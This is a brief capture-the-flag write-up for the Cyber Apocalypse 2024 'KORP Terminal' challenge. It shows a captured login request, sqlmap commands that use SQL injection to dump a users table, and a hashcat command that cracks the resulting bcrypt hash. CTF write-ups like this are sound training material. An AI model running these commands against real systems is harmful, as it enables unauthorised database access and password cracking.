KORP Terminal Writeup

Cyber Apocalypse 2024

Solved by : Legend, thewhiteh4t

Challenge presents us with a login page
Testing SQL injection shows that it is vulnerable

POST request from burpsuite :

    POST / HTTP/1.1
    Host: 94.237.58.148:47562
    Content-Length: 66
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://94.237.58.148:47562
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.57 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Referer: http://94.237.58.148:47562
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    username=a&password=a

SQLMap

> sqlmap -r post.txt --ignore-code 401

> sqlmap -r $PWD/post.txt --ignore-code 401 -T users -dump

This hash is crackable with hashcat

> hashcat -a 0 -m 3200 hash.txt /usr/share/wordlists/rockyou.txt

$2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv.:password123

Published on : 16 Mar 2024